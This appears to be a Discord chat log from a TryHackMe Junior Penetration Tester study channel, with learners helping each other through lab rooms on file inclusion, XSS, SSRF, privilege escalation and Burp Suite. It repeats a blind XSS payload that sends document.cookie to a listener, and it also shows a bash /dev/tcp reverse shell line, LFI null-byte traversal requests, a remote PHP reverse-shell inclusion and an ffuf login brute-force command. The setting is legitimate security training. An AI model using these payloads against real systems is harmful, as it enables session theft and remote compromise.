#junior-pentester-path

or this?

Like this, so the first one

the browser automatically converts that like this.....

Does it? Okay, so what's the response you get from the page then ?

Just a sec sir.. My pc freezed .. Need to hard shut down it.. Need to set all again

Okay, so just as a heads up in case I'm not here anymore. If you are still not getting the flag with the request in the screenshot my message is replying to, this most likely comes from your null byte being url encoded and therefore is not doing what you want it to do. So get rid of that url encoding

Would you suggest using curl or a browser?

Hm, if you understand what's happening it basically doesn't matter what you use 🙂

So dev tools should be fine too, although curl will add the correct header on it's own if you specify a POST request

So that might make things easier

Tried this in firefox then in curl, no avail

and also the less messy ../ path

So what's the response you get from the page?

In browser: nothing

Well after pressing the send button, you have to double click that new request, in order to get opened in the browser

So the page is not changing on it's own if you just press send

Got this from curl, just had to fight Civ 6 for my PC back XD

Correct

What was the full curl command you used?

But for now I would stick with the dev tools, as you are already pretty close

CAnn't reaaly understand , why dev tools were not working

curl -H "Content-Type: application/x-www-form-urlencoded: -X POST "http://machine_ip/challenges/chall3.php?file=../../../etc/flag3 (suffixed all: %00 ./ %2e%2f)

As I said, this was most likely due to your null byte was url encoded

So , %00 was converting to %2500 ...that's why it was creating problem?

Yes

Ohhk. Thankyou so much sir for ur time..
On my way to gain an RCE in next task(playgroung)....lol

Well I would stick with the dev tools as I said, as in that curl request you are again not specifying the parameter you want to send correctly, beside that the POST option seems to be within the header

Ahh I see the issue now

Got it done, but I think I'll be brushing up on headers and curl tomorrow. Thanks for the help @shadow echo

Gave +1 Rep to @shadow echo

Finally!!!! Completed file inclusion room... the playground was quite simple

I need help

Tryhackme/room/contentdiscovery , task 3 (manual discovery -favicon) I am trying to download favicon using (curl (site url) | md5sum

But nothing is downloading

I got the hash, but not matching with any of OWASP favicon database

Try using the FIND option present in browser. Paste the hash in that. It should match!

The URL was not correct. That's why hash was not matching.

@heavy cape please do not ask the same question over multiple channels.

can i check for metasploit exploitation is anyone able to find the version running on port 8000

i tried nmap -sV -p 8000 <machine ip> -Pn but it does not seem to work. I also use the http_version module but after it ran nothing appear

thank you i manage to solve the issue

Noob nmap question: When I run a Windows "nmap --script vuln IP" scan against my own test environment, just for learning purposes, I get a CVE hit. Since I have many systems and also VM's running in my test environment, I'd like to know if there is a way for NMAP to narrow down to the machine that has this vulnerability?

Rather than doing the same command on all of my hosts, can it tell me the internal LAN IP of the host with this exposure?

Authentication Bypass | Jr.Pentest path-

I'm running the command:

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.202.94/customers/login -fc 200

I end up getting this result without finding any passwords. Is there something I might be missing?

Check your usernames file, it's not supposed to have anything else in it then just the usernames

This worked! Thank you for your help!

Gave +1 Rep to @shadow echo

File Inclusion

Would someone mind taking a look at this and guide me through, I can't seem to grasp the lesson

not passwd.php just passwd

is the only thingy shadow can think of

otherwise for good measure just stick more ../ onto it

after some tinkering, it worked. Thanks for the help!

Gave +1 Rep to @sage current

no problem

Almost done, working on "winprivesc" room now ... not really familiar with windows/cmd/pwrshell/etc ... got a little stuck on DLL hijacking, I think recreating the VM will solve it 🤞 ... but I'm missing something RE user vs admin and ability to start/stop dllsvc ...

So i guess i can "start" dllsvc to trigger it to read my hijacked.dll ... but cannot update/restart to test a newly compiled dll? ... it takes so long to start a new VM, don't wanna do it again 😛 ... but i will haha

Haha ok

I feel so lost in Windows lol

yeah you can't restart the service and that sucks

Ok at least I'm not crazy

What should I look at for next path/rooms after the Jr pen tester?

I wanna do everything lol, still not even sure what's out there

the linux CTFs sounds fun!

i was gonna try to solo a random CTF just to see how it goes lol .. have some friends might make a team eventually

https://giphy.com/gifs/mfw-room-kaDAIEecq0YuI

finally got it 👍

Can someone help me with Burp suite? When I try "Open browser" from Interception is on tab, it shows following error " net.portswigger.devtools.client.a: Refusing to start browser as your configuration does not support running without sandbox ". How can I resolve this?

Project options -> Misc -> Embeded browser -> Tick "allow the embedded browser to run without a sandbox"

Came here for the exact same thing 😄

Thank you!

Gave +1 Rep to @remote iris

Still having issues on XSS Task 8, I've gone through the forum post and still can't get any cookie captured (except my own). Any ideas?

What is your payload?

</textarea><script>fetch('http://MACHINE_IP?cookie=' + btoa(document.cookie) );</script>

Literally copied from the task

And are you using nc or the cookie stealer?

Tried both multiple times, neither worked 😦

Ok, I know this machine doesn't like the wrong attempts etc,

Do you have the machine open?

Not at the moment but I'm about to boot back into Kali

I thought that as well so I tried restarting the host machine occasionally as well

Okay, I'm booting up a machine also.

Booting the lab now

Me too

Just a quick check.

Are you entering the port number too in your payload?

When I was using nc - yes

Okay

This is the payload I've got ready

Are you using NC?

not this time, using the thm request catcher

borked

Ok, let's try nc first? I feel it's quicker.

yeh just a heads up, the request catcher is broken for some time now, :)
http://10.10.10.100

So I've got this ready to go: </textarea><script>fetch('http://10.4.64.xx:9999?cookie=' + btoa(document.cookie) );</script>

And I've got nc listening on 9999

You need to put a : before the 9999

so it's 10.4.64.xx:9999

Like that?

I didn't know that, thenk you.

Yeah, like that :L

It's hard to see, granted

Start the nc first then post the cookie, and wait about 10 second(s)

+rep @maiden stratus

Gave +1 Rep to @maiden stratus

#rep

Waiting for a reply now

oops

Has it appeared?

Nope 😦

try a python webserver,

python3 -m http.server 9999```

https://tryhackme.com/room/burpsuiteom
On task 4 of this room , I am unable to solve The last challenge?

Nice, I'll try it now

What's your THM ip?

you can DM me if you want.

I'll message you now

Looks like every key is same!

You solved it meanwhile ?
They might look the same, but they are not

Check the permissions of that backup.sh file

No, Not solved yet!

I saw some forums . Something like this was written "Last line is important, maje sure to copy that, some text editors leave that line and...... "

Yes and that's correct

There has to be a new line at the end

Blank?

Yes

Ohkay ... Will try that.. Currently away from computer.

Jeeez was having a hard time with that xss one…
What worked for me is using the Attack box and netcat.

The request catcher did not work and for some reason using nc on my Vm also did not work….

hm weird... glad you solved it somehow though

Yeah, the cookie catcher has been borked for some time I was told.

yeah the cookie catcher part shadow understands... the nc on the vm not working is what confused shadow

Honestly, it's hit and miss, I spent 15 min(s) with someone yesterday in DM trying to get it to work, it would work for me, but wouldn't work for them. They're going to to the rest of the path and leave that to end.

Greetings all! I just finished the command injection practical and I was wondering if someone could explain why I had to use a ";" to put the commands in correctly. Is there something in the source code that I am missing that the ";" closes out?

Do you know what ; does at the command line?

Hi! First off, I am starting learning CS, so bare with me please. :). I know how wifi cracking works and people might get into my network. Or that I can get into someone’s wifi home network if passphrase is weak. But I also know, it’s near impossible to decrypt SSL traffic without planting a root CA in the victim device. Plus, DNS spoofing works some of the time depending on how naive is the target. So, why is it so much of a risk if someone gets into home wifi other than using my IP for evil activities and getting me in trouble with law enforcement for having my IP identified with some “online hacking activities”. I mean other than planting a CA root cert on the victim device what else can be done that’s of high risk beside online hacking activities?

accessing ports that are not portforwarded to the internets

Access to your LAN

Right, but you mean they may look for machines in my LAN that are volunruble to reverse shell meybe? Where they can steal my passwords…etc?

they might also use your connection to impersonate you on the internets or impersonate you for the isp

Yes that’s what I meant by getting me in trouble with law enforcement for example if they use my IP for malicious activities.

Or access your router with default creds, your smart fridge, your IP CCTV cameras, your TV

Okay! I get you now. So, perhaps they get to my router with default creds. What level of impact they can do with that?

Change your DNS to something malicious, backdoor the router, capture all traffic passing through it, disable encryption on services that use STARTTLS style implementations like email

man in the middle the handshake for ssl

Eh, that's not so easy

still a possiblity right james???

Routers are, most of the time, just Linux ARM/MIPS PCs

Depends on a lot of factors

okay thanks for the info james

Wow! So they can actually disable encryption on my router without me noticing that when I access https sites or even be noticed by the CA publisher?

Not for HTTPS

And it'll depend on the remote service configuration

But many protocols had encryption added later on, and the client and server negotiate whether they will do encryption

If the client says "hey I don't support encryption" the server can't talk to it encrypted.

If the router rewrites the clients requests so that the server thinks the client won't support it, and rewrites the servers responses to make the client think the server won't support it, encryption can be disabled for some protocols

I hadn’t thought of it in that context (I.e. stopping one action and starting another). I know they mention it in one of the lessons, about closing one action before putting in the code, but I didn’t catch that part. Thanks.

Gave +1 Rep to @idle bison

Do I have everything I need to answer question one of Task 4(Local File Inclusion) of the File Inclusion Room

Yes.

hi

my main language is Java.recently,I faced a python CVE that is understand difficultly for me.
i have a question.How to face CVE ?

• each one i study and understand
• only study Java CVE,other CVE just know how to use PoC and exp
  which one is better?

Am I anywhere close to the expected request?

Outline I am following

https://website.thm/item/2?server=api.website.thm/api/flag&x=&id=9

wait a few sec

You're close.

api isn't needed.

So use 'server.website.thm'? instead? Leave both API's out?

eugh why can't shadow get this stupid thingy to work again

Yes.

Take out both api.

weird shadow has the right syntax but it is not working for some reason

=&id=9 is also wrong.

If it's not working, it's possibly the wrong syntax.

oh wait figured it out

You're wanting the id to be 9.

wooops

no second http:// needed

So it's

?id=9

the hint also tells you to end it with &x=

And then &x=

https://website.thm/item/2?server=server.website.thm/flag&x=&id=9?

No,

||flag?id=9&x=||

https://website.thm/item/2?server=api.website.thm/api/flag?id=9&x=?

Take away the api.

the first api

replace with server

https://website.thm/item/2?server=server.website.thm/flag?id=9&x=?

sorry i meant server

the last ? is not needed but other then that it is correct

Bingo.

took shadow over 5 hours to figure that problem out themselves back then

I'd assume it's the question mark as their response is a question.

oooh okays

How did the revised link go?

Excellent. Thanks for your help

Gave +1 Rep to @remote iris

Np!

Happy Hacking!

no problem here eitehr

I hated these rooms.

except that shadow snagged themselves again

yo

in the Windows Privesc room, sc query windefender and sc queryex type=service both don't return any result

are you running it in the command prompt or in powershell???

powershell

it works on cmd

I thought powershell was cmd but just better

guess I was wrong

sc in powershell is an alias for some powershell command

So you need to use sc.exe query

ok I get it thanks !!

Gave +1 Rep to @idle bison

and thx @sage current

@sage current thanks - hehe I stole your rep

Gave +1 Rep to @sage current

no problem

Why am I not seeing any base encoding formatting when I click on the private directory after I 'View Page source'

And this is task 5 of the SSFR rooom

right click the avatar image and click view source

I think you have to inspect and change the radio button.

Could be wrong I've slept since I did it

Hi all!, so the command injection course, were you able to get the output in the web app?

It does not show for me

Is it a trick question? Or unexpected behavior?

don't recall

Yes @steel nymph

So perhaps I need to combine expected input with a command

Thanks!

Hi, i need some help with NetSecMod Room 04 nmap, i did the scan an no os was detected, am being asked what os i found what should i do? is this a bug?

add -T4 or -T5

Huh? I'm confused, why would that change the result ?

No idea, but it does.

lol, okay

Sarcastic? lol

No 😂

Lol, if that was me I would be like "wat"

See here.

Definitely a Sony Android TV

My display?

Ye

I'm on a mobile workstation.

Oh no I meant the results 😄

Loooool

It's not my night.

Thanks

Gave +1 Rep to @remote iris

can anyone explain the 1st question

what is nonstandard port?

There are services that typically use a certain port like 21 for ftp and 22 for ssh. So those are the standard port, but the service can be set up to use any port so if ftp is on other than 21 it's using a nonstandard port

ok

thanks i understand

Gave +1 Rep to @nimble portal

For task 8 of the Cross site scripting room , the base64 payload is supposed to appear right? I am not getting anything on my netcat listening command when I create a ticket and put this payload in the text area of my ticket:
</textarea><script>fetch('http://10.10.108.35?cookie=' + btoa(document.cookie) );</script>

You're not entering the port.

It needs to be "10.10.108.35:9001"

ahh, ok

always forget that

hoping someone can help me out, as this is probably pretty simple. Working on the file inclusion lab challenge #3, and I am able to get it to work using curl but not when using the developer debug tools.

can DM me if you wanna debug more without spoilers here in shared channel 😄

This is most likely due to a missing header, which curl adds on it's own when specifying a POST request

Ok I will dig into this more, Thnx!

@maiden stratus THANK YOU!

Gave +1 Rep to @maiden stratus

Been stuck on that crontab for better part of the day and couldn't figure out what I was doing wrong

Your welcome 🙂

You're*

What is the general consensus on using youtube/walkthroughs to help with rooms? I'm moving along in the file inclusion room but this one seems to be a bit more challenging

you do you. if you use youtube/walkthrough, i'd recommend taking notes 🙂

just to make sure the info sticks

#offensive-pentesting-path message

Are you also adding a question to your screenshots?

Thanks for answering. I agree it depends on how you are using the walkthroughs. For me its to fully comprehend the material although I do need to get better with note taking

Gave +1 Rep to @warm badge

Under Authentication bypass Task 2,I am finding it difficult to input " in the terminal. it is not showing at all

So I was doing the Metasploit: Exploitation room and was on the final challenge, I could not get the hash dump no matter what I did. I even looked at a write up and did the exact same steps but still didn't work

Can you elaborate on "Didn't work"?

What are you seeing? Errors? Nothing? What are you doing in particular?

sorry dealing with a head cold today was well and so I would run the reverse shell lisener in msfconsole, then run the program on the target machine. Attack machine would hear it, then I put the session in the background and loaded up post/linux/gather/hashdump set session id and ran. Then the target machine would end and the attack would say session closed

I went back through and was able to get it, not sure what went wrong maybe a space in a place is wasn't suppose to be

no worries, I need to get better at it too!

Man I just spent 15mins trying to figure out why ls and ls-l wasn't working on Netsecchallenge.

It was working. ||There was just nothing there||

Vuln capstone ✅

Didn't need to look at anything, just found a vuln, set up nc, got shell, found flag. Ezpz

Felt like I actually knew what I was doing for a minute

nice good job done there

Anyone here with a eJPT cert?

Not sure what you want to ask, but I guess it fits more in #cyber-and-careers

thanks!

Gave +1 Rep to @shadow echo

Went on to do metasploit and immediately felt like I knew nothing again 🤣

hi folks! did someone finished this room https://tryhackme.com/room/xssgi recently ? . It doesn't seem to be working. I just visit the forum, and try to reproduce every step even with help... But I still can't get the staff-cookie.

my payload looks like this:
</textarea><script>fetch('http://10.5.XXX.XX/?cookie=' + btoa(document.cookie) );</script>

and when I read the source code seems fine, also it works when I trigger it myself.

And I am using http to access the lab http://{ip}.p.thmlabs.com

If you can trigger to receive your own session cookie, your payload seems to be fine. So I suggest restarting the target machine and try again.
Make sure the first ticket you create has the working payload.
In case it's still not working after that, restart the target machine once more and try using the attackbox to catch the staff session cookie

Oh, and I suggest you are accessing the target machine by it's IP instead of that URL

THX !!! I'll try using the attack box this time!!

And make sure accessing it via the IP instead of the URL

thx man!! let's hope it will work 😆 it's been hours kkkk

@shadow echo it worked !!!! thx dude!!

Gave +1 Rep to @shadow echo

192.168.193.14:80 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec)

does anyone know where I could find a payload

?

when I show options

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

Name Current Setting Required Description

Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.193.14 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Me
tasploit
RPORT 80 yes HTTP port (TCP)
RPORT_FTP 21 yes FTP port
SITEPATH /var/www yes Absolute writable website path
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to the website
TMPPATH /tmp yes Absolute writable path
VHOST no HTTP server virtual host

Exploit target:

Id Name

0 ProFTPD 1.3.5

its a ctf I found on HTB

Msfvenom would be a good place to start.

Might I suggest doing the metasploit series on tryhackme? You'd learn all about metasploit and msfvenom

Burp Suite Intruder Room , Task 10 Practical Example. Why is the Payload set Tab only presenting me with '1' when I selected the Attack type as 'Pitch Fork'? cont'd

end

Nevermind. I needed to press the 'Add' button as I didn't need to press the clear button for my username and password as there were no cookies in my results

For Task 11 of this The Burp Suite Room, I needed to restart the Burp Suite Community tool by recapturing this link right?(http://10.10.68.240/support/ticket/78)

Hi, i have been having issues with getting the size of the file using scp, would it be possible for the creator of box to make a change on that, letting the users know its easier to get the file using curl
Thank you, i enjoyed the walkthrough.

#room-bugs for reporting issues with rooms/answers please

What you mean by "restart the burp suite community tool"? Yes, that's the url you need, where the part of the url with the number is the one that's getting Fuzzed

because I wanted to know if I was using the information in the Burp suite community tool from Task 10

I ran a for loop in python that prints numbers 1 through 100 and then pasted those numbers into the Pay load options box. Would that be sufficient?

There's a better way of doing it

Payload type has a relevant option

It would be sufficient, yes. But as James said, there would be a better way, where you can set it within Burp, instead of having to create a list with numbers

Doing the Linux Privesc room. Kernel exploits.

Used nano to save an exploit in /Downloads as cve.c
Python3 -m http.server 4444 in /Downloads

wget http://IP:4444/cve.c on target.

cve.c : permission denied
Cannot write to 'cve.c' (permission denied)

Not sure what I'm doing wrong?

You are most likely trying to wget that file while being in a directory where you don't have write permisson in

As I posted this I had that thought

Moved to /tmp on the target and it worked

Thanks

Gave +1 Rep to @shadow echo

Hi does anyone complete https://tryhackme.com/room/winprivesc / hijackdll? I copy hijackdll to c:\temp but don't know what service to restart. Because dllsvc don't have in machine and I can't install Process Monitor to the computer. How can I pass this quest? Thanks

where is the input field to exploit lfi?

There is no input field on that page, so you have to find a different way to exploit it

i found the solution through cookies 😄

@shadow echo thanks for your help!

Gave +1 Rep to @shadow echo

Hi guys! I am stuck on "VulnNet: Internal" a couple of hours, and couldn't figure out a way to get a foothold. I guess I'm missing something basic, does anyone have any tip, on things to try or to study to beat the room ?

For task 4 Decoder hashing of the Burp Suite the Modules room, after I converted the keys to an MD5 hash sum value, would I covert it to a Base64 encoding code or an ASCII-hex text?

ASCII Hex

So I went ahead and guessed what the key value was in that answer box and when I tried that key value in the Decoder , it wasn't showing me the ASCII Hex value that matche the ASCII Hex value in the last question

I also don't know what 'endline' they are talking about in the hint because I copied every line

They key isn't hex, it has characters outside that range.

You should be hashing the keys, not decoding them

Hash the keys, represent the hash in hex

Hashes are just binary data

I converted the key into initially an MD5 hash? Am I suppose to convert it to another hash format

I can't see md5 selected here?

Or is it just not showing?

After completing the junior pentester path, what sort of boxes should I be looking at ? Medium?

And you're not converting the key by hashing it, you're hashing it. It's not a conversion. Understanding hash functions and the correct terminology around them is important

Do some easy ones, if you're doing them without too much challenge and not learning much then move on to harder ones

The difficult range within easy on tryhackme is quite wide

This was my initial conversion

Right so you've got 4 keys right?

One of them should hash to the value provided.

So you need to apply the operations to all of them and see

yes and I guessed the correct one to save time( i initially tried all 4 and wasn't getting any values) but when I tried the correct one and converted it initially to md5 and then to ascii-hex I still had issues

*any correct values

Figured it out, apparently I needed to include an extra white space after the end of the last line of the key.

A newline at the end of the file is part of it. It's what the files contain too

Can someone explain what hashing is and why it’s important in hacking

https://tryhackme.com/room/hashingcrypto101 if you're a subscriber

It's a none reversible encryption.

Usually a "salt" is used to make the hash irreversible.

Usually a "salt" is used to make the hash irreversible. That's not what it's for

Hashing is inherently a one way function.

It's not encryption

🤔 encoding? I thought the salt was so you couldn't just reverse the "encoding"

It's also not encoding.

The salt is to prevent rainbow table attacks.

But you could generate your own rainbow tables with the salt right?

Yes

But if you want to crack 10 hashes, they all should have different salts

It massively increases the amount of work you need to put in and storage you need for the tables, making it infeasible.

Yeh, it definitely makes it more difficult

So it's just "hashing" ?

Hashing is irreversible regardless of whether a salt is used. The salt makes rainbow table attacks much more difficult (but not impossible if someone really wanted to and had the resources?)

It's a one way function

Salts mean you need a new table for every different salt. It effectively means you might as well brute force it unless you have a bunch of hashes with the same salt

yes hash is one way

In file inclusion room's last challenge (RFI) I used a file containing reverse php shell and tried to include it in web address as well as include tab but it shows no response

Only when I put that file in include tab it shows err 405 this method is not allowed

How are you hosting that shell file ?

Also, I suggest you verify your thm profile in discord, in order to be able to send screenshots.
Screenshots making things way easier 🙂

!docs verify

i made a directory and hosted a webserver using python in that directory

So you used the python http.server ?

yes

And you are getting no requests in that terminal where the python server is running ?

nah

What's the full URL you are using on the target machines webpage to request that file ?

http://10.10.132.89/playground.php?file=http://10.10.162.3/php-reverse-shell.php

tried it for once more

I dont know where i am going

Well first of all, if you are trying to serve the shell file, you have to use the python server.
But in that screenshot you have shut down the python server again and instead started netcat.

The second thing, when you have the python server running, you have to specify the port of it in the URL on the target machines webpage

python server is on another terminal

i started netcat so that i can gain shell and give commands to the server

explain this

how to do this

Oh, I thought it was the python server you have shut down again, never mind that part then if you have it running in a different terminal.

response on python terminal

Ok great, so it seems you have specified the port correct now.

So did you receive the rev shell now ?

no

Show a screenshot of your rev shell file content pls

i guess this part matters most

here we were supposed to put victim ip or our ip?

and what port we had to use

?

The port has to match the port you are using for your netcat listener.
And since the target machine needs to know where to connect back to, it has to be your attackbox IP

so dumb of me

These are common mistakes, so not dumb 🙂

still not working

these are correct configs right?

Looks like, yes

http://10.10.132.89/playground.php?file=http://10.10.162.3:8000/php-reverse-shell.php

this is what i typed in search bar

Ok ?

Why isn't it working

So did you check the nc listener?
Did it not say connection received ?

It says nothing

Can I access your target machine and try myself ?

netcat listener

You have all information

You may!

Changed netcat listener port 1234

Still no progress

Are you getting any request in your python server? Since I don't.
So you might want to restart the target machine

I am

Your IP ends with 89?

Argh hold on

I had the firewall on for some other purpose 😄

Okay, well then that might not work with that rev shell

Are you getting the 404 errors as in your previous screenshot or 200 as success?

All 404

Then another question is the file you are requesting in the same folder as you are hosting the python server?

No

Oh, hold on, actually it works just fine, my rev-shell file was just bad it seems

Then that is a problem

You need to host the python server on the same directory where your file is

Oh, seems I have overseen the 404 errors, I guess I should take a break

Yes

It's some weird signs

Those weird signs are because of me or @shadow echo

Hm, what you mean 😄 ?

I mean everything is freezed and I have refreshed the webpage

And it doesn't connect

Refresh the room page and check if the target machine is still up, maybe the timer ran out

But you have to refresh it, since the timer not always shows the correct time

I just restarted everything

So, have you managed to get a rev shell now ?

how's it going?

Hey 👋
I need some help in linux privilege escalation in cronjob

oh sure

did you mark the thingy as executable????

My badd🤦🏻🤦🏻
No
I marked it now as a executable

Thanks 🫡

Gave +1 Rep to @sage current

Got revshell🤍

congratz

also this is such a common mistake shadow defaults to asking the question if you marked it as executable by now

chmod +x right?

yuups that is the easiest way to do it

Just checking I understood.

So I am in the Linux PrivEsc room and doing task 5 but it won't let me do wget, says permission denied, is there something I should of done that I am missing. I've logged in as karen and I can see matt but can't figure out what to do since I cant get the exploit over to the system. I've even used a python server to move it over but still give me permission denied

Cant quite remember this one, ill have a look at the task to see if I can remember. Have you tried another method of getting I am assuming is LINpeas on the machine?

Pretty sure I tried the other method and also didnt work, do you know what the other method would be? (For future knowledge)

Okay so the other method should work

Also try to use wget in the tmp directory

If you are trying to do it in / it wont work

ok let me try thank you for the advice

Are you trying to upload linpeas or the exploit code ?

I was trying to do both but to no avail but since moving over to tmp I can get LINpeas so I am going to try the exploit next

Okay cool, question for you, if wget is blocked, what is the other method to getting your code onto the target?

Because Im sure youll run into that issue eventually

@molten dust Thank you so much!!!

Gave +1 Rep to @molten dust

I got the Flag!!

Nice! Did you have to compile the exploit?

not sure but Ill be looking that up

I compliled it on my system then moved it over then chmod and ran

Have a think, ill give you a hint. Copy/Paste

clipboard?

Same thing haha

If you cant upload a file, then why not make your own

through nano or another text editor

Yeah

Yep I did try that on that system but super low level priv

Have fun with task 7, I like exploiting SUID, GTFObins is your friend

Best friend in fact

Sweet I am excited I love doing this stuff so much fun

Im just starting on Windows stuff, Kerberus etc, im so lost. Linux is so much easier

If you want to teat out your linux foothold-privesc skills. Check out Proving Grounds by Offensive Security

https://tryhackme.com/room/rrootme

This one looks pretty easy too, im going to do it tomorrow

nice will do thanks @molten dust

Gave +1 Rep to @molten dust

Just done Rootme and LazyAdmin, highly recommend, good fun

Sweet

I am not able to solve this ques can anyone help

i found the cookie converted it but the ans is wrong

by bas64

You have more than likely caught your own cookie.

Are you using NC?

nah i used burp

for fetching it

Hm, I didn't do it that way, I just used NC.

ohky should i try with nc

Can't hurt.

🙂

what was the base64 string you tried before?

I started Nmap today and it is fun.

How can you do the rooms from your own linux, from a virtual box?

lol and how do you do that?

im still noob my bad?

I'll be hanging out in general voice channel for a while, if you wanna hop in and we can get it setup together 😄 👍

Ok on IDOR task 7 I click on start machine and i dont see it?

if you want to join voice, need to verify discord (connect with THM account)

!docs verify

On task 9 of this room (https://tryhackme.com/room/linprivesc), I am not getting the reverse shell with root permission (trying the same payload provided in the task). Instead, I'm getting the karen@ip10.x.x.xshell.

PAYLOAD:
#!/bin/bash bash -i >& /dev/tcp/10.x.x.x/4444 0>&1

Check the permissions of the file

It has root permission

That's the owner, not the permissions
And to be clear, to check the permissions of the file you want cron to execute

Lemme see

yes

./backup.sh

cron

..

😶

yeah..

My bad that I executes it my self

Yes.. Now trying that way(waiting for it to get executed)

Thanks Mr. @steel nymph for your help.. Solved it!

Just few steps away from completing Jr.Pentester path 😄

am unable to fetch cookie on the xss last question

You should provide more details, with such little info it's hard to help

https://media.discordapp.net/attachments/900054524373397574/966677562694709288/unknown.png

You have to verify in order to be able to send screenshots in here

!docs verify

if you check on last question it require either to connect throught two methods an i prefer nc but whenever i connect and enter that payload on comment i don get the cookies

Best to verify and send a screenshot, as well as the full payload you are using and the full URL of the target machines webpage you are on

</textarea><script>fetch('http://myturnel:9001?cookie=' + btoa(document.cookie) );</script>

If you disguise the IP it's hard to tell if you are using the right one.
Also please let me have the full URL of the target machines webpage you are on

If you open the ticket on your own, are you able to receive your own session cookie ?

i once got a session cookie but when i decoded the answer was not correct

what ip shouli i use ? my turnel ip or machine ip?

Yes, this is due to that you opened the ticket on your own, therefore only received your own session cookie instead of the one from staff.
Once you generated the ticket you have to wait until the automation behind it gets triggered and opens the ticket as a staff member.
If you don't receive it within 1 - 2 mins, restart the target machine, if it's still not working after that, restart the target machine and try to catch the cookie on the attackbox

If you are on your own machine, then the tun0 IP, yes.
Also, I asked you for the full URL of the webpage for the 3rd time now ^^

thanks

Gave +1 Rep to @shadow echo

lem try again

is it okay to start offensive pentesting after pre-security or should i start jr penetration tester after pre-security need suggestions🙂

If you have no significant additional experience, you should do jr. Pentest first

Is there any way to copy command from room to attack box ?

or other way at least ?

Yeah, there is a little grey square.

Or triangle? on the left hand side of the attackbox

or there is arrow buttons down the bottom to put it in full screen mode.

oh

xD

thanks

I lost like 1 hour trying to manually type command which I got wrong obv

Ouch, well, it's good you know now. 🙂

Is it necessary to clean this .txt file to only include result without this status and size to work for brute force on login ?

using ffuf

yea it need to cleaned out, not sure if there is way to get this output already in this simple text format and what is best way to clean it afterwards

you only need usernames not that status stuffs

it will not take a long time to type again in a new text file

How do you format output diffrently then ? This seems to be default output of previous command

I just edited file manually, because it was short

when i did this room i typed the username manually

Just wanted to pass

Anyone have to do a 4th interview with a ceo?

I passed 3 interviews and they did not involve me speaking with someone , I had to hack 2 websites for the first 2 and find issues in code for the 3rd interview

Yes I noticed after lol. Btw mango lassi over everything

No I have been referred

Is there any other way to escape .php ? I am trying null byte exploit as explained, but it's not working.

tried 0x00 and \0 but none worked

hmm, how to make sure I am sending null byte ?
I am not sure what are you referring when you say encoding ? This is post request so no URL encoding should be present here.

Well this is body of request, it's not send via URL

multipart/form-data; boundary=<calculated when request is sent>

lol copy paste 😢

machine died on me

meh

can't try

Btw where is best place to host single php file for this chall ?
I tried on local python server but it doesn't allow for any routing just directory listing

yeah I know, will figure out how to allow some routing to files for that python server

well I added hosts to python server so I can access it under example.com:8000

it lists all files

but example.com:8000/hostname.php is not working

oh right lol

btw is are servers dead ?

can't connect to machine

yeah but lost requests I had

Still can't get this null byte exploit, I changed header as advised but it's still reading it as regular string

yea

Thanks for help, I am done for tonight, got all flags except one, gonna leave that for tomorrow since I am not familiar with burp suite. Good night !

Gave +1 Rep to @steel nymph

dont use that input field play with only URL 😉

Will try, tho already it cuts all path travels chars and it's not possible to escape them just by doubling them

url worked perfect for me in LFI Jr pentester

It worked for lab1 or 2, one was reading path for cookie, one required you to use post instead of get. Hint for this one is that not everything is filtered out, post is working for most of part just can't escape .php at the end

Maybe filter is on client side wiill try using url directly

So I have completed the whole Jr.Pentester Path

The event ticket ended.

Months ago.

Ohhk

@steel nymph Getting a bit frustrated, I know it's just small detail.
No luck with curl either .

curl -X POST -H "Content-Type: application/x-www-form-urlencoded" -B -d "file=../../../../etc/flag3%2500" http://10.10.5.21/challenges///chall3.php?file=welcome

It won't interpret that stupid null byte as it's suppose to

wrong one

%2500

I tried with %20 but it just added space

can you send me exact command ?

someone is trolling me

Well I put %2500 not %20

so it should result in %00 when decoded

I tried 0x00 too

ok it works lol

no, just a wrong

line

curl -X POST -d "file=../../../../etc/flag30x00" http://10.10.5.21/challenges///chall3.php?file=welcome

\0 ?

I don't get it, %00 - when encoded is %2500, if I send just %00 it doesn't work if I send %2500 it still doesn't work

%00 shouldn't result to anything

well I already provided few commands that I send

curl -X POST -d "file=../../../../etc/flag3%20" http://10.10.5.21/challenges///chall3.php?file=welcome

this is just single encode

yeah missed that one

jeez

thanks

Feeling like an junior, with stupid questions and mistakes. Working for 4 years web dev .NET 💩

It's very different beeing dev and pentesting or cyber sec. in general at least that is my first impression. In cyber sec. you need to go into every small detail

Is Task 8 from https://tryhackme.com/room/xssgi viable in a real-world scenario? What I mean by this is that connecting to the target machine using the HTTPS format (https://lab_web_url.p.thmlabs.com/) instead of just the HTTP one will cause the browser to block the request to our attack machine listening on netcat (after we inject the XSS payload on the "Create Ticket" form), because the listening server is HTTP, so the browser blocks it due to mixed content.

I have tried Nmap's Ncat with --ssl flag, but obviously no browser is going to trust the certificate

Just out of curiosity btw - I have completed the task in any case

I see, that's great! Thanks a lot for your help! 🙏

Cross site scripting room task 8 Practical Example........am I missing something or is this room busted? Im using the TryHackMe request catcher but nothing is appearing. I've tried waiting a few minutes and even went back to the ticket

Request catcher is broken, use netcat instead

I thought I had everything right. Thanks for the help!

@brittle jetty
I was doing that task like 30mins ago, had same doubt why it doesn't work with catcher.
Decided to try first method with netcat and it worked

Why does my connection keep closing out for task 3 of the Protocols and Servers room

Capital H

I am not sure what you mean

Headers are technically not case sensitive, but correct host: to Host: and see if it fixes it.

Okay

That didn't work. Do you think I should try another port number( even though this is an HTTP task) .

oh you said 'to Host:'

I highly guess you are not pressing enter 2 times, that's the only issue

That could be it. It does say press twice in the instructions

yep that was it

Im trying to solve Task 8 of XSS called Practical Example (Blind XSS) but Im not getting any response cookie from the website

This is my payload

And this is my terminal

Am I missing anything? Please guide me

are you connected to the openvpn?
curl 10.10.10.10/whoami should give you your ip if you are

Yes

Im connected to openvpn

do you capture your own cookie when you submit it?

I didnt capture anything

did anything hit?

Nothing

Same as always

Im here to confirm if its a bug or did I make a mistake

I'm trying it now, likely a mistake

